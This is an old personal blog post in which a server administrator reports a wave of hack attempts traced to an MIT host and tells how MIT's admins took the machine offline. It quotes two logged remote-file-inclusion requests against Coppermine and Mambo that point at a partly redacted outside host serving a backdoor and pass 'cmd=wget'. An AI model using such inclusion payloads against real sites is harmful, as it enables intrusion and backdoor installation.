Hack Attemps from MIT

<< Fixing Drupal 4.7.x to run on PHP 5.2.1 | Serverpronto reloaded - wrong charges once again >>

Mon, 11/27/2006 - 17:23 — Christoph C. Cemper

Over the last 24 hours a lot of my servers and sites were hammered by port scans and hack attempts…

and this time it was not China (which is blocked by 80% anyway on my machines) but a server coming directly from the MIT.EDU

It were a ton of hack attempts trying to install phishing scripts and viruses on some of my servers and websites.

The attaching IP was 128.30.67.23 and resolves to galle.csail.mit.edu which could be a compromised private machine in the MIT network.

In particular it was tried to exploit some old versions of the open source software coppermine

requesting e.g.

/modules/coppermine/themes/default/theme.php?THEME_DIR=http://omgmydbhere.gamexpress.xxxxx /CMD.gif?&cmd=wget

which obviously would install a virus or backdoor (don't try to download that .gif, it's a binary that is detected as backdoor immediately here, but you could be hurt by it… – I removed some url parts to protect you … actually it ended in co.il

The same crap seems to work in mambo-style portals, judging from the URL I got here

/site/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://omgmydbhere.gamexpress.SUCKERS/CMD.gif?&cmd=wget

I mailed the admins at MIT asking them to act immediately by taking down that machine and ensuring it will no longer perform hack attempts.

Major problem seems to be that there seem to be scripts out there that ALLOW the installation of any kind of file or script or even BINARY from ANY url supplied via the web…

so in fact coppermine AND mambo seem to be backdoor-threats themselves…

I'm rushing out to make sure I deinstalled all abandoned test-installs of those hazardous scripts.

update – ok – MIT is using "RT" as request tracker, so I got my ticket already :-)

and better – the next minute the admin Noah replied with

"Acknowledged. The host has been removed from the network pending investigation."

Finally complaining makes sense – good to know there are people taking care of the virus and botnet spreaders….

Average rating

(0 votes)

Similar entries

This server is safe from Nimda and CodeRed II !

There are still many really old virus-generations out there… this server is being attacked on regular basis by standard worms aswell as script kiddies brute force attacks … checkout the last months attack pie by the Tipping Point protection my…
MyDoom spreading incredibly fast

MyDoom Virus spreading incredibly fast
Variant of MyDoom.B ? - detailed Removal Description for MyDoom.B

F-Secure Computer Virus Information Pages on Mydoom.B proide some more usefull info on hunting down MyDoom.B The worm will perform a DDoS attack against www.microsoft.com on 3rd of February 2004 at 13:09:18 (UTC) and www.sco.com on 1st of February 2004…
Mambo Search Engine Friendly - OpenSEF

Mambo, Search engine friendly CMS evaluation
W32.Swen.A@mm virus

Got another mailbomb virus today – W32.Swen.A@mm virus – with an attachment called Q172894. The Microsoft-Lookalike warning is frigthening… just some text-sample about it here… make sure your virus-definitions are up to date… x-mas is virus time…...

Search

Recent comments

Recent posts

Categories

Navigation

Backlinks

User login

Hack Attemps from MIT

Similar entries

Blog tags

Favorites

Blog entry

Page